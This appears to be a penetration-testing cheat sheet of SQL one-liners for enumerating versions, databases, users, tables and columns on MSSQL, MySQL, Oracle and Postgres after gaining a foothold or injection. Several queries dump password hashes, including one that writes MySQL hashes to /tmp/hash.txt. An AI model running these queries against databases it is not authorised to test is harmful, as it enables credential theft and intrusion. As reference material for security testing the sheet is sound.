Databases#
SQL one-liners the operator reaches for during target development across the major engines. Versions, current database, users, schemas, password hashes, all the things to enumerate after foothold or injection.
MSSQL#
SELECT @@version;
SELECT DB_NAME();
SELECT name FROM master..syslogins;
SELECT name FROM master..sysdatabases;
SELECT table_catalog, column_name FROM information_schema.columns;
SELECT table_catalog, table_name FROM information_schema.columns;
SELECT SL.name, SL.password_hash FROM sys.sql_logins AS SL;
MySQL#
SELECT @@version;
SELECT database();
SELECT user FROM mysql.user;
SELECT distinct(db) FROM mysql.db;
SHOW columns FROM mytable FROM mydb;
SHOW tables FROM mydb;
SELECT User, Password FROM mysql.user INTO OUTFILE '/tmp/hash.txt';
Oracle#
SELECT user FROM dual UNION SELECT * FROM v$version;
SELECT global_name FROM global_name;
SELECT username FROM all_users ORDER BY username;
SELECT DISTINCT owner FROM all_tables;
SELECT column_name FROM all_tab_columns WHERE table_name = 'mydb';
SELECT table_name FROM all_tables;
SELECT name, password, spare4 FROM sys.user$ WHERE name='<username>';
Postgres#
SELECT version();
SELECT current_database();
SELECT username FROM pg_user;
SELECT datname FROM pg_database;
SELECT column_name FROM information_schema.columns WHERE table_name='data_table';
SELECT table_name FROM information_schema.tables;
SELECT username, passwd FROM pg_shadow;